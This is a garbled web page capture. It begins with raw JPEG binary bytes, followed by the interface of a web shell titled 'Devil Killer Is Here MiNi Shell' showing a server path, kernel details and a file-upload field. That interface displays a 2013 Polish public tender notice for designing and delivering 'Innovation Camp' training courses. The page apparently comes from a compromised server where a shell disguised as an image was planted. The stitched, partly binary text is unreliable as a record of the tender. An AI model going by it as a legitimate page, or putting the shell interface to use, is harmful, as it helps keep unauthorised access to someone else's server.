JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130724/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130724/292978-N-2013.html

<p class="kh_header"><b>Szczawno-Zdrój: Usługa w zakresie opracowania programu szkolenia - Obozu Innowacji oraz przeprowadzenia cyklu szkoleń - Obozów Innowacji w ramach Projektu: SPINqbator Zdolnego Śląska. Nr zamówienia publicznego: ZP/NO/SZP/39/2013.</b><br>
<b>Numer ogłoszenia: 292978 - 2013; data zamieszczenia: 24.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A. , ul. Szczawieńska 2, 58-310 Szczawno-Zdrój, woj. dolnośląskie, tel. 074 64 80 400, faks 074 64 80 417.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.darr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie opracowania programu szkolenia - Obozu Innowacji oraz przeprowadzenia cyklu szkoleń - Obozów Innowacji w ramach Projektu: SPINqbator Zdolnego Śląska. Nr zamówienia publicznego: ZP/NO/SZP/39/2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje: 

Przedmiotem zamówienia jest usługa w zakresie:
A.opracowania programu szkolenia (Obozu Innowacji) w oparciu o podręcznik Campguide (załącznik nr 9 do ogłoszenia) oraz wytyczne Zamawiającego zawarte w niniejszym ogłoszeniu;
B.zapewnienia moderatora oraz trzech ekspertów wspomagających (na każde ze szkoleń - Obozów Innowacji);
C.przeprowadzenie cyklu szkoleń (Obozów Innowacji) w oparciu o program zaakceptowany przez Zamawiającego.

Szczegółowy zakres zamówienia:

A.Opracowanie programu szkolenia (Obozu Innowacji).

- Wykonawca opracuje program szkolenia (Obozu Innowacji) w oparciu o podręcznik Campguide (załącznik nr 9 do ogłoszenia) oraz wytyczne Zamawiającego zawarte w niniejszym ogłoszeniu. Program szkolenia (Obozu Innowacji) winien obejmować minimum 36 godzin dydaktycznych w formule: wykłady, warsztaty, praca w grupach. Szkolenie winno obejmować pięć dni zajęć dydaktycznych po poniedziałku do piątku. Program szkolenia winien zakładać podział uczestników na 3 zespoły projektowe po ok. 5 osób każda. Zadaniem każdej z grup jest stworzenie wirtualnej firmy oraz opracowań dokumentujących powstanie wirtualnej firmy: wizja(strategia, budżet, struktura organizacyjna/struktura zatrudnienia, plan(strategia ochrony własności intelektualnej, plan marketingowy, źródła finansowania inwestycji. Program szkolenia winien opierać się na pracy moderatora oraz przynajmniej trzech ekspertów wspomagających. Zadaniem ekspertów wspomagających jest prowadzenie wykładów, warsztatów oraz pomoc zespołom projektowym w przygotowaniu opracowań dokumentujących powstanie wirtualnych firm. 

Program szkolenia winien czerpać doświadczenia w organizacji Obozów Innowacji zawartych w podręczniku Camguide (załącznik nr 9 do ogłoszenia).

Każdy z zespołów otrzyma (na czas szkolenia - Obozu Innowacji) przenośmy komputer z dostępem do Internetu.

B.Zapewnienie Moderatora oraz minimum trzech ekspertów wspomagających.

- Wykonawca zapewni Moderatora, który obecny będzie w trakcie całego szkolenia - Obozu Innowacji. Zadaniem Moderatora będzie moderowanie przebiegu szkolenia - Obozu Innowacji, koordynacja pracy uczestników szkolenia zgodnie z zatwierdzonym programem, koordynacja pracy ekspertów wspomagających, przeprowadzenie testów i ankiet sprawdzających, koordynacja tworzenia przez zespoły projektowe wirtualnych firm (oraz opracowań dokumentujących powstanie wirtualnej firmy).   

- Wykonawca zapewni minimum trzech ekspertów wspomagających z zakresów tematycznych: Prawo Własności Intelektualnej, Komercjalizacja Wiedzy, Finansowanie Innowacji, Współpraca z inwestorami kapitałowymi, Autoprezentacji( Prezentacja koncepcji biznesowych oraz ekspertów branżowych (z branż wskazanych w Dolnośląskiej Strategii Innowacji: I Projektowanie, wytwarzanie i zastosowanie materiałów zaawansowanych, II Technologie informacyjne, III Nauka i technologie na rzecz poprawy jakości życia, IV Odnawialne i alternatywne źródła energii). O ostatecznym doborze ekspertów wspomagających oraz czasowym ich zaangażowaniu zadecyduje Zamawiający w porozumieniu z Wykonawcą szkolenia w oparciu o program szkolenia (zaproponowany przez Wykonawcę, a następnie zatwierdzony przez Zamawiającego), a także potrzeby zrekrutowanej grupy). Minimalne zaangażowanie czasowe każdego z ekspertów wspomagających wyniesie: 1 dzień szkoleniowy.

C.Przeprowadzenie cyklu 4 szkoleń (Obozów Innowacji).

- Wykonawca przeprowadzi 4 szkolenia - Obozy Innowacji w oparciu o program zaakceptowany przez Zamawiającego w terminie wskazanym przez Zamawiającego. Każde ze szkoleń trwać będzie 5 dni (minimum 36 godzin dydaktycznych).

Cele szkolenia:

Głównym celem szkolenia - Obozu Innowacji jest dostarczenie jego uczestnikom wiedzy i praktycznych umiejętności z zakresu zarządzania projektami innowacyjnymi, komercjalizacji wiedzy, ochrony własności intelektualnej oraz biznesowych aspektów prowadzenia działalności gospodarczej, a także wykształcenie umiejętności pracy grupowej przy tworzeniu przedsięwzięć biznesowych.

Metodologia szkolenia:

Najważniejszym elementem szkoleń powinna być ich wartość praktyczna.

Szkolenie powinno mieć formę zarówno wykładową (np. wykład z zakresu Prawa Własności Intelektualnej) jak i praktycznych warsztatów grupowych i w podgrupach (około 70% programu).

Szkolenia powinny obejmować również pracę na zgłoszonych przez Uczestników przypadkach/pomysłach biznesowych i odnoszenie się do ich realiów zawodowych. Przykłady i odwołania do rzeczywistości przedstawiane i omawiane podczas warsztatów będą dotyczyły realnych sytuacji, z którymi Uczestnicy szkoleń stykają się na co dzień. 

Praca zespołów projektowych winna zostać zakończona prezentacją każdego z zespołów projektowych (każdej z wirtualnych firm) przed gronem ekspertów reprezentujących Zamawiającego. W trakcie prezentacji eksperci Zamawiającego pełnić będą rolę ekspertów funduszy kapitałowych szukających możliwości inwestowania w nowe przedsięwzięcie. 

Rekrutacja do udziału w szkoleniach (Obozach Innowacji) leży po stronie Zamawiającego. Osoby (zespoły projektowe zrekrutowania do udziału w szkoleniach (Obozach Innowacji) zgłaszają pomysł biznesowy (w branży wskazanej w DSI), który zostanie rozwinięty w trakcie trwania szkolenia (Obozu Innowacji) - i otrzyma formę wirtualnej firmy. Zamawiający przekaże Wykonawcy listę uczestników wraz ze zgłoszonymi pomysłami biznesowymi najpóźniej na 7 dni przed rozpoczęciem szkolenia (Obozu Innowacji). Wykonawca w porozumieniu z Zamawiającym oraz zespołem projektowym może zmienić pomysł biznesowy na inny - i w trakcie szkolenia (Obozu Innowacji) rozwijać inny pomysł niż ten zgłoszony przez uczestnika/zespół projektowy.

Wszyscy pracownicy Wykonawcy oraz osoby uczestniczące w szkoleniach (Obozach Innowacji) z ramienia Wykonawcy zobligowani są do podpisania oświadczenia o zachowaniu poufności w stosunku do pomysłów zgłoszonych przez uczestników szkoleń (Obozów Innowacji).

Miejsce prowadzenia szkolenia: Dolny Śląsk (miejscowości w powiecie jeleniogórskim i/lub mieście Jelenia Góra).

Szczegółowe informacje na temat miejsca szkolenia Zamawiający przekaże Wykonawcy najpóźniej na 14 dni przed planowanym szkoleniem.

Zamawiający zapewni:
- salę wykładową (na 5 dni szkoleniowych) wraz z wyposażeniem (projektor multimedialny, laptop, flipchart z blokiem, markery, krzeseł, stoły, dostęp do Internetu) 
- wyżywienie dla uczestników szkolenia
- noclegi dla uczestników szkolenia
- zwrot kosztów dojazdu na szkolenie dla uczestników szkolenia
- przenośne komputery z dostępem do Internetu dla każdej z grup projektowych (3 komputery na każde szkolenie)

Zamawiający nie zapewni moderatorowi, ekspertom wspomagającym ani żadnemu przedstawicielowi Wykonawcy zakwaterowania ani wyżywienia. 

Zadanie obejmuje w szczególności:
a)Przygotowanie szczegółowego programu szkolenia (Obozu Innowacji);
b)Przygotowanie formatów opracowań dokumentujących powstanie wirtualnych firm (wizja/strategia, budżet, struktura organizacyjna/struktura zatrudnienia, plan/strategia ochrony własności intelektualnej, plan marketingowy, źródła finansowania inwestycji);
c)przygotowanie materiałów szkoleniowych (w formie Prezentacji PowerPoint, ćwiczeń, itp.);
d)przekazanie w formie elektronicznej przygotowanych materiałów Zamawiającemu (wydruk materiałów szkoleniowych po stronie Zamawiającego);
e)poprowadzenie Szkolenia w miejscu i terminie wskazanym przez Zamawiającego;
f)zapewnienie trzech ekspertów wspomagających na każdy z Obozów Innowacji;
g)przygotowanie wspólnie z uczestnikami szkolenia - Obozu Innowacji, opracowań dokumentujących powstanie Wirtualnej firmy (wizja/strategia, budżet, struktura organizacyjna, struktura zatrudnienia, plan/strategia ochrony własności intelektualnej, plan marketingowy, źródła finansowania inwestycji);
h)przygotowanie i przeprowadzenie pre/posttestów wśród uczestników Szkolenia;
i)przeprowadzenie wśród uczestników szkolenia ankiet samooceniających (przygotowanie ankiet po stronie Zamawiającego).

Na przygotowywanych przez Wykonawcę materiałach szkoleniowych powinny się znajdować, zgodnie z zasadami wizualizacji, logo projektu, logo PO KL, UE oraz informacja na temat współfinansowania usługi ze środków Unii Europejskiej w ramach EFS..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w sposób szczegółowy. Ocena spełniania ww. warunku dokonana zostanie w oparciu o złożone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że w okresie 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał:  
a) przynajmniej 2 usługi (szkolenia/warsztaty/kursy) z zakresu komercjalizacji wiedzy (minimum 36 godzin dydaktycznych każde) dla grupy docelowej, jakimi są: studenci, absolwenci (do 12 miesięcy od zakończenia studiów), doktoranci, pracownicy naukowi oraz naukowo-dydaktyczni uczelni wyższych dla łącznej liczby minimum 30 uczestników, o łącznej wartości minimum 18 000,00 PLN brutto
lub
- studia podyplomowe z zakresu komercjalizacji wiedzy dla łącznej liczby minimum 30 uczestników, o łącznej wartości minimum 18 000,00 PLN brutto;
Za zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia Zamawiający uznaje usługi szkolenia z dziedziny komercjalizacji wiedzy, które obejmowały co najmniej następujące zagadnienia: Finansowanie badań i innowacji, Ochrona własności intelektualnej, Komercjalizacja badań.
b) opracował przynajmniej dwa autorskie programy szkoleń/warsztatów/studiów podyplomowych/kursów z zakresu komercjalizacji wiedzy w wymiarze minimum 36 godzin dydaktycznych, dla grupy docelowej, jakimi są: studenci, absolwenci (do 12 miesięcy od zakończenia studiów), doktoranci, pracownicy naukowi oraz naukowo-dydaktyczni uczelni wyższych.
W celu potwierdzenia spełniania tego warunku Wykonawcy zobowiązani są przedłożyć: 
wykaz usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu/ dowodu potwierdzającego, że te dostawy lub usługi zostały wykonane należycie (wzór wykazu stanowi Załącznik nr 5 do ogłoszenia). W przypadku studiów podyplomowych współfinansowanych ze środków Unii Europejskiej - za dokument/ dowód potwierdzający należyte wykonanie zadania Zamawiający uzna dokument wystawiony przez IP/IP2 w postaci akceptacji ostatecznego WNP- z dokumentu musi jednak jednoznacznie wynikać, że wskaźniki założone w projekcie współfinansowanym ze środków UE zostały osiągnięte w 100%, a Projekt rozliczony bez zastrzeżeń IP/IP2.

Dowody potwierdzające należyte wykonanie usług uwzględnionych w wykazie o którym mowa powyżej:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż Ne 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu;
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa powyżej.

W przypadku, gdy Zamawiający jest podmiotem na rzecz którego usługi wskazane w wykazie którego wzór stanowi Załącznik nr 5 do ogłoszenia zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających należyte wykonanie usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w sposób szczegółowy. Ocena spełniania ww. warunku dokonana zostanie w oparciu o złożone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać iż dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonywania zamówienia, tj. osobami, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do realizacji zakresu szkoleń (przedstawionego w przedmiocie zamówienia; w tym osobami określanymi jako Moderator oraz ekspert wspomagający:

- co najmniej jedną osobą - Moderator - posiadającą wykształcenie wyższe, doświadczenie w przeszkoleniu co najmniej 30 uczestników szkoleń (skierowanych dla studentów, absolwentów, doktorantów, pracowników naukowych oraz naukowo-dydaktycznych uczelni wyższych) w okresie ostatnich 3 lat;

- co najmniej trzema osobami - Ekspertami wspomagającymi - posiadającymi wykształcenie wyższe oraz doświadczenie w realizacji usług szkoleniowych lub doradczych (w tematach wskazanych w pkt. 3.2 B Ogłoszenia) dla wskazanej grupy docelowej tj.: dla studentów, absolwentów, doktorantów, pracowników naukowych oraz naukowo-dydaktycznych uczelni wyższych w okresie ostatnich 3 lat (należy opisać doświadczenie zawodowe przykładowych ekspertów wspomagających z grupy jaką dysponować będzie Wykonawca - o ostatecznym doborze ekspertów wspomagających oraz czasowym ich zaangażowaniu zadecyduje Zamawiający w porozumieniu z Wykonawcą szkolenia w oparciu o program szkolenia (zaproponowany przez Wykonawcę, a następnie zatwierdzony przez Zamawiającego), a także potrzeby zrekrutowanej grupy.

Ocena spełniania ww. warunku dokonana zostanie w oparciu o Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami- wzór wykazu stanowi Załącznik nr 6 do ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w sposób szczegółowy. Ocena spełniania ww. warunku dokonana zostanie w oparciu o złożone oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie w zakresie art. 22 ust. 1 ustawy (według Załącznika nr 2 do ogłoszenia).
- W przypadku wniosków składanych przez Wykonawców występujących wspólnie - pełnomocnictwo dla reprezentanta z określeniem zakresu pełnomocnictwa oraz oświadczenia każdego ze wspólników, że spełniają warunki udziału w postępowaniu określone w art. 22 ust.1 p. 1-4 i nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo Zamówień Publicznych - jeżeli taka sytuacja występuje.
- Wykaz części zamówienia przewidywanych do realizacji przez podwykonawców (wzór wykazu stanowi Załącznik nr 7 do ogłoszenia).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Zamawiający przyzna po 1 punkcie za wykazanie każdej kolejnej należycie wykonanej usługi (potwierdzonej referencjami lub dokumentami równoważnymi) powyżej progu minimalnego określonego w pkt 5.2 b) ogłoszenia o zamówieniu  w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- opracował więcej niż dwa autorskie programy szkoleń/warsztatów/studiów podyplomowych/kursów z zakresu komercjalizacji wiedzy w wymiarze minimum 36 godzin dydaktycznych (każde), dla grupy docelowej, jakimi są: studenci, absolwenci (do 12 miesięcy od zakończenia studiów), doktoranci, pracownicy naukowi oraz naukowo-dydaktyczni uczelni wyższych- przy czym za każdy kolejny autorski program Zamawiający przyzna 1 pkt.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
